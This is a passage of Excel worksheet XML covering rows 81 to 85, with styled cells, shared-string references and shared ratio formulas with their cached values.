      <c r="HM81" s="480"/>
      <c r="HN81" s="480"/>
      <c r="HO81" s="480"/>
      <c r="HP81" s="480"/>
    </row>
    <row r="82">
      <c r="J82" s="277"/>
      <c r="K82" s="434"/>
      <c r="L82" s="353"/>
      <c r="M82" s="353"/>
      <c r="N82" s="354"/>
      <c r="O82" s="278"/>
      <c r="Q82" s="271"/>
      <c r="R82" s="291" t="s">
        <v>2568</v>
      </c>
      <c r="S82" s="292"/>
      <c r="T82" s="292"/>
      <c r="U82" s="292"/>
      <c r="V82" s="292"/>
      <c r="W82" s="292"/>
      <c r="X82" s="292"/>
      <c r="Y82" s="292"/>
      <c r="Z82" s="292"/>
      <c r="AA82" s="292"/>
      <c r="AB82" s="292"/>
      <c r="AC82" s="292"/>
      <c r="AD82" s="292"/>
      <c r="AE82" s="292"/>
      <c r="AF82" s="293"/>
      <c r="AG82" s="271"/>
      <c r="AH82" s="294" t="s">
        <v>2569</v>
      </c>
      <c r="AI82" s="292"/>
      <c r="AJ82" s="292"/>
      <c r="AK82" s="292"/>
      <c r="AL82" s="292"/>
      <c r="AM82" s="292"/>
      <c r="AN82" s="292"/>
      <c r="AO82" s="292"/>
      <c r="AP82" s="292"/>
      <c r="AQ82" s="292"/>
      <c r="AR82" s="292"/>
      <c r="AS82" s="292"/>
      <c r="AT82" s="292"/>
      <c r="AU82" s="292"/>
      <c r="AV82" s="292"/>
      <c r="AW82" s="292"/>
      <c r="AX82" s="292"/>
      <c r="AY82" s="292"/>
      <c r="AZ82" s="292"/>
      <c r="BA82" s="292"/>
      <c r="BB82" s="292"/>
      <c r="BC82" s="292"/>
      <c r="BD82" s="292"/>
      <c r="BE82" s="292"/>
      <c r="BF82" s="292"/>
      <c r="BG82" s="292"/>
      <c r="BH82" s="292"/>
      <c r="BI82" s="292"/>
      <c r="BJ82" s="292"/>
      <c r="BK82" s="292"/>
      <c r="BL82" s="292"/>
      <c r="BM82" s="292"/>
      <c r="BN82" s="292"/>
      <c r="BO82" s="292"/>
      <c r="BP82" s="292"/>
      <c r="BQ82" s="292"/>
      <c r="BR82" s="292"/>
      <c r="BS82" s="292"/>
      <c r="BT82" s="292"/>
      <c r="BU82" s="292"/>
      <c r="BV82" s="292"/>
      <c r="BW82" s="292"/>
      <c r="BX82" s="292"/>
      <c r="BY82" s="292"/>
      <c r="BZ82" s="292"/>
      <c r="CA82" s="292"/>
      <c r="CB82" s="292"/>
      <c r="CC82" s="292"/>
      <c r="CD82" s="292"/>
      <c r="CE82" s="292"/>
      <c r="CF82" s="292"/>
      <c r="CG82" s="292"/>
      <c r="CH82" s="292"/>
      <c r="CI82" s="292"/>
      <c r="CJ82" s="292"/>
      <c r="CK82" s="292"/>
      <c r="CL82" s="292"/>
      <c r="CM82" s="292"/>
      <c r="CN82" s="292"/>
      <c r="CO82" s="292"/>
      <c r="CP82" s="292"/>
      <c r="CQ82" s="292"/>
      <c r="CR82" s="292"/>
      <c r="CS82" s="292"/>
      <c r="CT82" s="292"/>
      <c r="CU82" s="292"/>
      <c r="CV82" s="292"/>
      <c r="CW82" s="292"/>
      <c r="CX82" s="292"/>
      <c r="CY82" s="292"/>
      <c r="CZ82" s="292"/>
      <c r="DA82" s="292"/>
      <c r="DB82" s="292"/>
      <c r="DC82" s="292"/>
      <c r="DD82" s="292"/>
      <c r="DE82" s="292"/>
      <c r="DF82" s="292"/>
      <c r="DG82" s="292"/>
      <c r="DH82" s="292"/>
      <c r="DI82" s="292"/>
      <c r="DJ82" s="293"/>
      <c r="DK82" s="271"/>
      <c r="DO82" s="279"/>
      <c r="DP82" s="271"/>
      <c r="DQ82" s="271"/>
      <c r="DR82" s="271"/>
      <c r="DS82" s="271"/>
      <c r="DT82" s="271"/>
      <c r="DU82" s="271"/>
      <c r="DV82" s="271"/>
      <c r="DW82" s="271"/>
      <c r="DX82" s="271"/>
      <c r="DY82" s="271"/>
      <c r="DZ82" s="271"/>
      <c r="EA82" s="271"/>
      <c r="EB82" s="271"/>
      <c r="EC82" s="271"/>
      <c r="ED82" s="280"/>
      <c r="EG82" s="279"/>
      <c r="EH82" s="271"/>
      <c r="EI82" s="271"/>
      <c r="EJ82" s="271"/>
      <c r="EK82" s="271"/>
      <c r="EL82" s="271"/>
      <c r="EM82" s="271"/>
      <c r="EN82" s="271"/>
      <c r="EO82" s="271"/>
      <c r="EP82" s="271"/>
      <c r="EQ82" s="271"/>
      <c r="ER82" s="271"/>
      <c r="ES82" s="271"/>
      <c r="ET82" s="271"/>
      <c r="EU82" s="271"/>
      <c r="EV82" s="271"/>
      <c r="EW82" s="271"/>
      <c r="EX82" s="271"/>
      <c r="EY82" s="271"/>
      <c r="EZ82" s="271"/>
      <c r="FA82" s="280"/>
    </row>
    <row r="83">
      <c r="J83" s="277"/>
      <c r="K83" s="352" t="s">
        <v>2570</v>
      </c>
      <c r="L83" s="403" t="s">
        <v>2571</v>
      </c>
      <c r="M83" s="403" t="s">
        <v>2572</v>
      </c>
      <c r="N83" s="404" t="s">
        <v>2573</v>
      </c>
      <c r="O83" s="278"/>
      <c r="Q83" s="271"/>
      <c r="R83" s="315" t="s">
        <v>2447</v>
      </c>
      <c r="S83" s="316" t="s">
        <v>2093</v>
      </c>
      <c r="T83" s="316" t="s">
        <v>2013</v>
      </c>
      <c r="U83" s="316" t="s">
        <v>951</v>
      </c>
      <c r="V83" s="316" t="s">
        <v>633</v>
      </c>
      <c r="W83" s="316" t="s">
        <v>1725</v>
      </c>
      <c r="X83" s="316" t="s">
        <v>244</v>
      </c>
      <c r="Y83" s="316" t="s">
        <v>427</v>
      </c>
      <c r="Z83" s="316" t="s">
        <v>1373</v>
      </c>
      <c r="AA83" s="316" t="s">
        <v>209</v>
      </c>
      <c r="AB83" s="316" t="s">
        <v>664</v>
      </c>
      <c r="AC83" s="316" t="s">
        <v>357</v>
      </c>
      <c r="AD83" s="316" t="s">
        <v>310</v>
      </c>
      <c r="AE83" s="316" t="s">
        <v>292</v>
      </c>
      <c r="AF83" s="317" t="s">
        <v>558</v>
      </c>
      <c r="AG83" s="271"/>
      <c r="AH83" s="291" t="s">
        <v>2447</v>
      </c>
      <c r="AI83" s="498" t="s">
        <v>2108</v>
      </c>
      <c r="AJ83" s="513" t="s">
        <v>2177</v>
      </c>
      <c r="AK83" s="498" t="s">
        <v>2193</v>
      </c>
      <c r="AL83" s="498" t="s">
        <v>2095</v>
      </c>
      <c r="AM83" s="498" t="s">
        <v>2074</v>
      </c>
      <c r="AN83" s="498" t="s">
        <v>2061</v>
      </c>
      <c r="AO83" s="498" t="s">
        <v>2015</v>
      </c>
      <c r="AP83" s="498" t="s">
        <v>953</v>
      </c>
      <c r="AQ83" s="498" t="s">
        <v>1040</v>
      </c>
      <c r="AR83" s="498" t="s">
        <v>1012</v>
      </c>
      <c r="AS83" s="498" t="s">
        <v>1164</v>
      </c>
      <c r="AT83" s="498" t="s">
        <v>1848</v>
      </c>
      <c r="AU83" s="498" t="s">
        <v>2300</v>
      </c>
      <c r="AV83" s="498" t="s">
        <v>1138</v>
      </c>
      <c r="AW83" s="498" t="s">
        <v>974</v>
      </c>
      <c r="AX83" s="498" t="s">
        <v>1108</v>
      </c>
      <c r="AY83" s="498" t="s">
        <v>1702</v>
      </c>
      <c r="AZ83" s="498" t="s">
        <v>1626</v>
      </c>
      <c r="BA83" s="514" t="s">
        <v>636</v>
      </c>
      <c r="BB83" s="498" t="s">
        <v>1726</v>
      </c>
      <c r="BC83" s="498" t="s">
        <v>822</v>
      </c>
      <c r="BD83" s="498" t="s">
        <v>445</v>
      </c>
      <c r="BE83" s="498" t="s">
        <v>1747</v>
      </c>
      <c r="BF83" s="498" t="s">
        <v>989</v>
      </c>
      <c r="BG83" s="498" t="s">
        <v>246</v>
      </c>
      <c r="BH83" s="498" t="s">
        <v>2242</v>
      </c>
      <c r="BI83" s="498" t="s">
        <v>1282</v>
      </c>
      <c r="BJ83" s="498" t="s">
        <v>429</v>
      </c>
      <c r="BK83" s="498" t="s">
        <v>912</v>
      </c>
      <c r="BL83" s="498" t="s">
        <v>1837</v>
      </c>
      <c r="BM83" s="498" t="s">
        <v>1510</v>
      </c>
      <c r="BN83" s="498" t="s">
        <v>1411</v>
      </c>
      <c r="BO83" s="498" t="s">
        <v>1397</v>
      </c>
      <c r="BP83" s="498" t="s">
        <v>1374</v>
      </c>
      <c r="BQ83" s="498" t="s">
        <v>677</v>
      </c>
      <c r="BR83" s="498" t="s">
        <v>790</v>
      </c>
      <c r="BS83" s="498" t="s">
        <v>262</v>
      </c>
      <c r="BT83" s="498" t="s">
        <v>771</v>
      </c>
      <c r="BU83" s="498" t="s">
        <v>724</v>
      </c>
      <c r="BV83" s="498" t="s">
        <v>211</v>
      </c>
      <c r="BW83" s="498" t="s">
        <v>805</v>
      </c>
      <c r="BX83" s="498" t="s">
        <v>932</v>
      </c>
      <c r="BY83" s="498" t="s">
        <v>1306</v>
      </c>
      <c r="BZ83" s="498" t="s">
        <v>1903</v>
      </c>
      <c r="CA83" s="498" t="s">
        <v>2335</v>
      </c>
      <c r="CB83" s="498" t="s">
        <v>1983</v>
      </c>
      <c r="CC83" s="498" t="s">
        <v>1999</v>
      </c>
      <c r="CD83" s="498" t="s">
        <v>1971</v>
      </c>
      <c r="CE83" s="498" t="s">
        <v>1201</v>
      </c>
      <c r="CF83" s="498" t="s">
        <v>750</v>
      </c>
      <c r="CG83" s="498" t="s">
        <v>666</v>
      </c>
      <c r="CH83" s="498" t="s">
        <v>892</v>
      </c>
      <c r="CI83" s="498" t="s">
        <v>1214</v>
      </c>
      <c r="CJ83" s="498" t="s">
        <v>1293</v>
      </c>
      <c r="CK83" s="498" t="s">
        <v>1331</v>
      </c>
      <c r="CL83" s="498" t="s">
        <v>2215</v>
      </c>
      <c r="CM83" s="498" t="s">
        <v>2261</v>
      </c>
      <c r="CN83" s="498" t="s">
        <v>359</v>
      </c>
      <c r="CO83" s="498" t="s">
        <v>1230</v>
      </c>
      <c r="CP83" s="498" t="s">
        <v>1812</v>
      </c>
      <c r="CQ83" s="498" t="s">
        <v>1958</v>
      </c>
      <c r="CR83" s="498" t="s">
        <v>1667</v>
      </c>
      <c r="CS83" s="498" t="s">
        <v>505</v>
      </c>
      <c r="CT83" s="498" t="s">
        <v>312</v>
      </c>
      <c r="CU83" s="498" t="s">
        <v>2289</v>
      </c>
      <c r="CV83" s="498" t="s">
        <v>411</v>
      </c>
      <c r="CW83" s="498" t="s">
        <v>1361</v>
      </c>
      <c r="CX83" s="498" t="s">
        <v>701</v>
      </c>
      <c r="CY83" s="498" t="s">
        <v>586</v>
      </c>
      <c r="CZ83" s="498" t="s">
        <v>294</v>
      </c>
      <c r="DA83" s="498" t="s">
        <v>339</v>
      </c>
      <c r="DB83" s="498" t="s">
        <v>370</v>
      </c>
      <c r="DC83" s="498" t="s">
        <v>394</v>
      </c>
      <c r="DD83" s="498" t="s">
        <v>1687</v>
      </c>
      <c r="DE83" s="498" t="s">
        <v>486</v>
      </c>
      <c r="DF83" s="498" t="s">
        <v>1889</v>
      </c>
      <c r="DG83" s="498" t="s">
        <v>1187</v>
      </c>
      <c r="DH83" s="498" t="s">
        <v>560</v>
      </c>
      <c r="DI83" s="498" t="s">
        <v>1175</v>
      </c>
      <c r="DJ83" s="499" t="s">
        <v>1926</v>
      </c>
      <c r="DK83" s="271"/>
      <c r="DO83" s="279"/>
      <c r="DP83" s="271"/>
      <c r="DQ83" s="271"/>
      <c r="DR83" s="271"/>
      <c r="DS83" s="271"/>
      <c r="DT83" s="271"/>
      <c r="DU83" s="271"/>
      <c r="DV83" s="271"/>
      <c r="DW83" s="271"/>
      <c r="DX83" s="271"/>
      <c r="DY83" s="271"/>
      <c r="DZ83" s="271"/>
      <c r="EA83" s="271"/>
      <c r="EB83" s="271"/>
      <c r="EC83" s="271"/>
      <c r="ED83" s="280"/>
      <c r="EG83" s="279"/>
      <c r="EH83" s="271"/>
      <c r="EI83" s="271"/>
      <c r="EJ83" s="271"/>
      <c r="EK83" s="271"/>
      <c r="EL83" s="271"/>
      <c r="EM83" s="271"/>
      <c r="EN83" s="271"/>
      <c r="EO83" s="271"/>
      <c r="EP83" s="271"/>
      <c r="EQ83" s="271"/>
      <c r="ER83" s="271"/>
      <c r="ES83" s="271"/>
      <c r="ET83" s="271"/>
      <c r="EU83" s="271"/>
      <c r="EV83" s="271"/>
      <c r="EW83" s="271"/>
      <c r="EX83" s="271"/>
      <c r="EY83" s="271"/>
      <c r="EZ83" s="271"/>
      <c r="FA83" s="280"/>
    </row>
    <row r="84">
      <c r="J84" s="277"/>
      <c r="K84" s="500">
        <f t="shared" ref="K84:N84" si="66">K49/$M$34</f>
        <v>0.04691239828</v>
      </c>
      <c r="L84" s="501">
        <f t="shared" si="66"/>
        <v>0.09534067337</v>
      </c>
      <c r="M84" s="501">
        <f t="shared" si="66"/>
        <v>0.122706239</v>
      </c>
      <c r="N84" s="502">
        <f t="shared" si="66"/>
        <v>0.1247805968</v>
      </c>
      <c r="O84" s="278"/>
      <c r="Q84" s="271"/>
      <c r="R84" s="352" t="s">
        <v>2551</v>
      </c>
      <c r="S84" s="501">
        <f t="shared" ref="S84:AF84" si="67">S36/S$29</f>
        <v>0.0004260758415</v>
      </c>
      <c r="T84" s="501">
        <f t="shared" si="67"/>
        <v>0</v>
      </c>
      <c r="U84" s="501">
        <f t="shared" si="67"/>
        <v>0.04838709677</v>
      </c>
      <c r="V84" s="501">
        <f t="shared" si="67"/>
        <v>0.1666666667</v>
      </c>
      <c r="W84" s="501">
        <f t="shared" si="67"/>
        <v>0</v>
      </c>
      <c r="X84" s="501">
        <f t="shared" si="67"/>
        <v>0.1428571429</v>
      </c>
      <c r="Y84" s="501">
        <f t="shared" si="67"/>
        <v>0.1428571429</v>
      </c>
      <c r="Z84" s="501">
        <f t="shared" si="67"/>
        <v>0.160037767</v>
      </c>
      <c r="AA84" s="501">
        <f t="shared" si="67"/>
        <v>0.01369863014</v>
      </c>
      <c r="AB84" s="501">
        <f t="shared" si="67"/>
        <v>0.4210526316</v>
      </c>
      <c r="AC84" s="501">
        <f t="shared" si="67"/>
        <v>2.571428571</v>
      </c>
      <c r="AD84" s="501">
        <f t="shared" si="67"/>
        <v>0.0002543273043</v>
      </c>
      <c r="AE84" s="501">
        <f t="shared" si="67"/>
        <v>0.8333333333</v>
      </c>
      <c r="AF84" s="502">
        <f t="shared" si="67"/>
        <v>0.03135888502</v>
      </c>
      <c r="AG84" s="271"/>
      <c r="AH84" s="497" t="s">
        <v>2551</v>
      </c>
      <c r="AI84" s="515">
        <f t="shared" ref="AI84:DJ84" si="68">IF(AI$29=0,"-",AI36/AI$29)</f>
        <v>0.0004262574595</v>
      </c>
      <c r="AJ84" s="515">
        <f t="shared" si="68"/>
        <v>0</v>
      </c>
      <c r="AK84" s="515">
        <f t="shared" si="68"/>
        <v>0</v>
      </c>
      <c r="AL84" s="515">
        <f t="shared" si="68"/>
        <v>0</v>
      </c>
      <c r="AM84" s="515">
        <f t="shared" si="68"/>
        <v>0</v>
      </c>
      <c r="AN84" s="515" t="str">
        <f t="shared" si="68"/>
        <v>-</v>
      </c>
      <c r="AO84" s="515" t="str">
        <f t="shared" si="68"/>
        <v>-</v>
      </c>
      <c r="AP84" s="515" t="str">
        <f t="shared" si="68"/>
        <v>-</v>
      </c>
      <c r="AQ84" s="515">
        <f t="shared" si="68"/>
        <v>0.008771929825</v>
      </c>
      <c r="AR84" s="515">
        <f t="shared" si="68"/>
        <v>0.25</v>
      </c>
      <c r="AS84" s="515" t="str">
        <f t="shared" si="68"/>
        <v>-</v>
      </c>
      <c r="AT84" s="515">
        <f t="shared" si="68"/>
        <v>1</v>
      </c>
      <c r="AU84" s="515">
        <f t="shared" si="68"/>
        <v>0.5</v>
      </c>
      <c r="AV84" s="515">
        <f t="shared" si="68"/>
        <v>0.6666666667</v>
      </c>
      <c r="AW84" s="515" t="str">
        <f t="shared" si="68"/>
        <v>-</v>
      </c>
      <c r="AX84" s="515">
        <f t="shared" si="68"/>
        <v>0.2222222222</v>
      </c>
      <c r="AY84" s="515" t="str">
        <f t="shared" si="68"/>
        <v>-</v>
      </c>
      <c r="AZ84" s="515">
        <f t="shared" si="68"/>
        <v>0</v>
      </c>
      <c r="BA84" s="515">
        <f t="shared" si="68"/>
        <v>0</v>
      </c>
      <c r="BB84" s="515" t="str">
        <f t="shared" si="68"/>
        <v>-</v>
      </c>
      <c r="BC84" s="515">
        <f t="shared" si="68"/>
        <v>0.3333333333</v>
      </c>
      <c r="BD84" s="515" t="str">
        <f t="shared" si="68"/>
        <v>-</v>
      </c>
      <c r="BE84" s="515">
        <f t="shared" si="68"/>
        <v>0</v>
      </c>
      <c r="BF84" s="515">
        <f t="shared" si="68"/>
        <v>0</v>
      </c>
      <c r="BG84" s="515">
        <f t="shared" si="68"/>
        <v>0</v>
      </c>
      <c r="BH84" s="515">
        <f t="shared" si="68"/>
        <v>1</v>
      </c>
      <c r="BI84" s="515">
        <f t="shared" si="68"/>
        <v>0</v>
      </c>
      <c r="BJ84" s="515">
        <f t="shared" si="68"/>
        <v>0</v>
      </c>
      <c r="BK84" s="515">
        <f t="shared" si="68"/>
        <v>0</v>
      </c>
      <c r="BL84" s="515">
        <f t="shared" si="68"/>
        <v>0</v>
      </c>
      <c r="BM84" s="515">
        <f t="shared" si="68"/>
        <v>0.1856014581</v>
      </c>
      <c r="BN84" s="515">
        <f t="shared" si="68"/>
        <v>0.1438223938</v>
      </c>
      <c r="BO84" s="515" t="str">
        <f t="shared" si="68"/>
        <v>-</v>
      </c>
      <c r="BP84" s="515" t="str">
        <f t="shared" si="68"/>
        <v>-</v>
      </c>
      <c r="BQ84" s="515">
        <f t="shared" si="68"/>
        <v>0</v>
      </c>
      <c r="BR84" s="515" t="str">
        <f t="shared" si="68"/>
        <v>-</v>
      </c>
      <c r="BS84" s="515">
        <f t="shared" si="68"/>
        <v>0</v>
      </c>
      <c r="BT84" s="515">
        <f t="shared" si="68"/>
        <v>0</v>
      </c>
      <c r="BU84" s="515" t="str">
        <f t="shared" si="68"/>
        <v>-</v>
      </c>
      <c r="BV84" s="515">
        <f t="shared" si="68"/>
        <v>0</v>
      </c>
      <c r="BW84" s="515">
        <f t="shared" si="68"/>
        <v>0</v>
      </c>
      <c r="BX84" s="515" t="str">
        <f t="shared" si="68"/>
        <v>-</v>
      </c>
      <c r="BY84" s="515">
        <f t="shared" si="68"/>
        <v>0.5</v>
      </c>
      <c r="BZ84" s="515">
        <f t="shared" si="68"/>
        <v>0</v>
      </c>
      <c r="CA84" s="515" t="str">
        <f t="shared" si="68"/>
        <v>-</v>
      </c>
      <c r="CB84" s="515">
        <f t="shared" si="68"/>
        <v>0</v>
      </c>
      <c r="CC84" s="515">
        <f t="shared" si="68"/>
        <v>0</v>
      </c>
      <c r="CD84" s="515">
        <f t="shared" si="68"/>
        <v>0</v>
      </c>
      <c r="CE84" s="515" t="str">
        <f t="shared" si="68"/>
        <v>-</v>
      </c>
      <c r="CF84" s="515">
        <f t="shared" si="68"/>
        <v>0</v>
      </c>
      <c r="CG84" s="515">
        <f t="shared" si="68"/>
        <v>0</v>
      </c>
      <c r="CH84" s="515">
        <f t="shared" si="68"/>
        <v>1</v>
      </c>
      <c r="CI84" s="515">
        <f t="shared" si="68"/>
        <v>0</v>
      </c>
      <c r="CJ84" s="515">
        <f t="shared" si="68"/>
        <v>0</v>
      </c>
      <c r="CK84" s="515">
        <f t="shared" si="68"/>
        <v>2</v>
      </c>
      <c r="CL84" s="515" t="str">
        <f t="shared" si="68"/>
        <v>-</v>
      </c>
      <c r="CM84" s="515">
        <f t="shared" si="68"/>
        <v>0.6</v>
      </c>
      <c r="CN84" s="515">
        <f t="shared" si="68"/>
        <v>0</v>
      </c>
      <c r="CO84" s="515">
        <f t="shared" si="68"/>
        <v>0</v>
      </c>
      <c r="CP84" s="515">
        <f t="shared" si="68"/>
        <v>9</v>
      </c>
      <c r="CQ84" s="515">
        <f t="shared" si="68"/>
        <v>0</v>
      </c>
      <c r="CR84" s="515" t="str">
        <f t="shared" si="68"/>
        <v>-</v>
      </c>
      <c r="CS84" s="515">
        <f t="shared" si="68"/>
        <v>0.0002278284907</v>
      </c>
      <c r="CT84" s="515">
        <f t="shared" si="68"/>
        <v>0.001996007984</v>
      </c>
      <c r="CU84" s="515" t="str">
        <f t="shared" si="68"/>
        <v>-</v>
      </c>
      <c r="CV84" s="515">
        <f t="shared" si="68"/>
        <v>0</v>
      </c>
      <c r="CW84" s="515" t="str">
        <f t="shared" si="68"/>
        <v>-</v>
      </c>
      <c r="CX84" s="515">
        <f t="shared" si="68"/>
        <v>0</v>
      </c>
      <c r="CY84" s="515">
        <f t="shared" si="68"/>
        <v>0</v>
      </c>
      <c r="CZ84" s="515" t="str">
        <f t="shared" si="68"/>
        <v>-</v>
      </c>
      <c r="DA84" s="515" t="str">
        <f t="shared" si="68"/>
        <v>-</v>
      </c>
      <c r="DB84" s="515" t="str">
        <f t="shared" si="68"/>
        <v>-</v>
      </c>
      <c r="DC84" s="515" t="str">
        <f t="shared" si="68"/>
        <v>-</v>
      </c>
      <c r="DD84" s="515">
        <f t="shared" si="68"/>
        <v>2.5</v>
      </c>
      <c r="DE84" s="515">
        <f t="shared" si="68"/>
        <v>0</v>
      </c>
      <c r="DF84" s="515">
        <f t="shared" si="68"/>
        <v>0</v>
      </c>
      <c r="DG84" s="515" t="str">
        <f t="shared" si="68"/>
        <v>-</v>
      </c>
      <c r="DH84" s="515">
        <f t="shared" si="68"/>
        <v>0.04</v>
      </c>
      <c r="DI84" s="515">
        <f t="shared" si="68"/>
        <v>0</v>
      </c>
      <c r="DJ84" s="516">
        <f t="shared" si="68"/>
        <v>0</v>
      </c>
      <c r="DK84" s="271"/>
      <c r="DO84" s="279"/>
      <c r="DP84" s="271"/>
      <c r="DQ84" s="271"/>
      <c r="DR84" s="271"/>
      <c r="DS84" s="271"/>
      <c r="DT84" s="271"/>
      <c r="DU84" s="271"/>
      <c r="DV84" s="271"/>
      <c r="DW84" s="271"/>
      <c r="DX84" s="271"/>
      <c r="DY84" s="271"/>
      <c r="DZ84" s="271"/>
      <c r="EA84" s="271"/>
      <c r="EB84" s="271"/>
      <c r="EC84" s="271"/>
      <c r="ED84" s="280"/>
      <c r="EG84" s="279"/>
      <c r="EH84" s="271"/>
      <c r="EI84" s="271"/>
      <c r="EJ84" s="271"/>
      <c r="EK84" s="271"/>
      <c r="EL84" s="271"/>
      <c r="EM84" s="271"/>
      <c r="EN84" s="271"/>
      <c r="EO84" s="271"/>
      <c r="EP84" s="271"/>
      <c r="EQ84" s="271"/>
      <c r="ER84" s="271"/>
      <c r="ES84" s="271"/>
      <c r="ET84" s="271"/>
      <c r="EU84" s="271"/>
      <c r="EV84" s="271"/>
      <c r="EW84" s="271"/>
      <c r="EX84" s="271"/>
      <c r="EY84" s="271"/>
      <c r="EZ84" s="271"/>
      <c r="FA84" s="280"/>
    </row>
    <row r="85">
      <c r="J85" s="277"/>
      <c r="K85" s="434"/>
      <c r="L85" s="353"/>
      <c r="M85" s="353"/>
      <c r="N85" s="354"/>
      <c r="O85" s="278"/>
      <c r="Q85" s="271"/>
      <c r="R85" s="352" t="s">
        <v>2552</v>
      </c>
      <c r="S85" s="501">
        <f t="shared" ref="S85:AF85" si="69">S37/S$29</f>
        <v>0.1385811674</v>
      </c>
      <c r="T85" s="501">
        <f t="shared" si="69"/>
        <v>0.1802618328</v>
      </c>
      <c r="U85" s="501">
        <f t="shared" si="69"/>
        <v>0.9112903226</v>
      </c>
      <c r="V85" s="501">
        <f t="shared" si="69"/>
        <v>1.083333333</v>
      </c>
      <c r="W85" s="501">
        <f t="shared" si="69"/>
        <v>0</v>
      </c>
      <c r="X85" s="501">
        <f t="shared" si="69"/>
        <v>2014.714286</v>
      </c>
      <c r="Y85" s="501">
        <f t="shared" si="69"/>
        <v>0.7142857143</v>
      </c>
      <c r="Z85" s="501">
        <f t="shared" si="69"/>
        <v>2.111766789</v>
      </c>
      <c r="AA85" s="501">
        <f t="shared" si="69"/>
        <v>0.1095890411</v>
      </c>
      <c r="AB85" s="501">
        <f t="shared" si="69"/>
        <v>1.789473684</v>
      </c>
      <c r="AC85" s="501">
        <f t="shared" si="69"/>
        <v>3.285714286</v>
      </c>
      <c r="AD85" s="501">
        <f t="shared" si="69"/>
        <v>0.002034618434</v>
      </c>
      <c r="AE85" s="501">
        <f t="shared" si="69"/>
        <v>1.166666667</v>
      </c>
      <c r="AF85" s="502">
        <f t="shared" si="69"/>
        <v>1</v>
      </c>
      <c r="AG85" s="271"/>
      <c r="AH85" s="352" t="s">
        <v>2552</v>
      </c>
      <c r="AI85" s="501">
        <f t="shared" ref="AI85:DJ85" si="70">IF(AI$29=0,"-",AI37/AI$29)</f>
        <v>0.1381074169</v>
      </c>
      <c r="AJ85" s="501">
        <f t="shared" si="70"/>
        <v>0</v>
      </c>
      <c r="AK85" s="501">
        <f t="shared" si="70"/>
        <v>2.5</v>
      </c>
      <c r="AL85" s="501">
        <f t="shared" si="70"/>
        <v>0</v>
      </c>
      <c r="AM85" s="501">
        <f t="shared" si="70"/>
        <v>0.1802618328</v>
      </c>
      <c r="AN85" s="501" t="str">
        <f t="shared" si="70"/>
        <v>-</v>
      </c>
      <c r="AO85" s="501" t="str">
        <f t="shared" si="70"/>
        <v>-</v>
      </c>
      <c r="AP85" s="501" t="str">
        <f t="shared" si="70"/>
        <v>-</v>
      </c>
      <c r="AQ85" s="501">
        <f t="shared" si="70"/>
        <v>0.9035087719</v>
      </c>
      <c r="AR85" s="501">
        <f t="shared" si="70"/>
        <v>0.5</v>
      </c>
      <c r="AS85" s="501" t="str">
        <f t="shared" si="70"/>
        <v>-</v>
      </c>
      <c r="AT85" s="501">
        <f t="shared" si="70"/>
        <v>1</v>
      </c>
      <c r="AU85" s="501">
        <f t="shared" si="70"/>
        <v>1.5</v>
      </c>
      <c r="AV85" s="501">
        <f t="shared" si="70"/>
        <v>1.333333333</v>
      </c>
      <c r="AW85" s="501" t="str">
        <f t="shared" si="70"/>
        <v>-</v>
      </c>
      <c r="AX85" s="501">
        <f t="shared" si="70"/>
        <v>1.333333333</v>
      </c>
      <c r="AY85" s="501" t="str">
        <f t="shared" si="70"/>
        <v>-</v>
      </c>
      <c r="AZ85" s="501">
        <f t="shared" si="70"/>
        <v>0.5</v>
      </c>
      <c r="BA85" s="501">
        <f t="shared" si="70"/>
        <v>0</v>
      </c>
      <c r="BB85" s="501" t="str">
        <f t="shared" si="70"/>
        <v>-</v>
      </c>
      <c r="BC85" s="501">
        <f t="shared" si="70"/>
        <v>4701</v>
      </c>
      <c r="BD85" s="501" t="str">
        <f t="shared" si="70"/>
        <v>-</v>
      </c>
      <c r="BE85" s="501">
        <f t="shared" si="70"/>
        <v>0</v>
      </c>
      <c r="BF85" s="501">
        <f t="shared" si="70"/>
        <v>0</v>
      </c>
      <c r="BG85" s="501">
        <f t="shared" si="70"/>
        <v>0</v>
      </c>
      <c r="BH85" s="501">
        <f t="shared" si="70"/>
        <v>1</v>
      </c>
      <c r="BI85" s="501">
        <f t="shared" si="70"/>
        <v>0</v>
      </c>
      <c r="BJ85" s="501">
        <f t="shared" si="70"/>
        <v>0</v>
      </c>
      <c r="BK85" s="501">
        <f t="shared" si="70"/>
        <v>1.333333333</v>
      </c>
      <c r="BL85" s="501">
        <f t="shared" si="70"/>
        <v>1</v>
      </c>
      <c r="BM85" s="501">
        <f t="shared" si="70"/>
        <v>4.490886999</v>
      </c>
      <c r="BN85" s="501">
        <f t="shared" si="70"/>
        <v>0.6</v>
      </c>
      <c r="BO85" s="501" t="str">
        <f t="shared" si="70"/>
        <v>-</v>
      </c>
      <c r="BP85" s="501" t="str">
        <f t="shared" si="70"/>
        <v>-</v>
      </c>
      <c r="BQ85" s="501">
        <f t="shared" si="70"/>
        <v>0</v>
      </c>
      <c r="BR85" s="501" t="str">
        <f t="shared" si="70"/>
        <v>-</v>
      </c>
      <c r="BS85" s="501">
        <f t="shared" si="70"/>
        <v>2</v>
      </c>
      <c r="BT85" s="501">
        <f t="shared" si="70"/>
        <v>1</v>
      </c>
      <c r="BU85" s="501" t="str">
        <f t="shared" si="70"/>
        <v>-</v>
      </c>
      <c r="BV85" s="501">
        <f t="shared" si="70"/>
        <v>0</v>
      </c>
      <c r="BW85" s="501">
        <f t="shared" si="70"/>
        <v>4</v>
      </c>
      <c r="BX85" s="501" t="str">
        <f t="shared" si="70"/>
        <v>-</v>
      </c>
      <c r="BY85" s="501">
        <f t="shared" si="70"/>
        <v>0.5</v>
      </c>
      <c r="BZ85" s="501">
        <f t="shared" si="70"/>
        <v>0</v>
      </c>
      <c r="CA85" s="501" t="str">
        <f t="shared" si="70"/>
        <v>-</v>
      </c>
      <c r="CB85" s="501">
        <f t="shared" si="70"/>
        <v>1</v>
      </c>
      <c r="CC85" s="501">
        <f t="shared" si="70"/>
        <v>0</v>
      </c>
      <c r="CD85" s="501">
        <f t="shared" si="70"/>
        <v>0</v>
      </c>
      <c r="CE85" s="501" t="str">
        <f t="shared" si="70"/>
        <v>-</v>
      </c>
      <c r="CF85" s="501">
        <f t="shared" si="70"/>
        <v>2</v>
      </c>
      <c r="CG85" s="501">
        <f t="shared" si="70"/>
        <v>0</v>
      </c>
      <c r="CH85" s="501">
        <f t="shared" si="70"/>
        <v>1</v>
      </c>
      <c r="CI85" s="501">
        <f t="shared" si="70"/>
        <v>0</v>
      </c>
      <c r="CJ85" s="501">
        <f t="shared" si="70"/>
        <v>0</v>
      </c>
      <c r="CK85" s="501">
        <f t="shared" si="70"/>
        <v>6</v>
      </c>
      <c r="CL85" s="501" t="str">
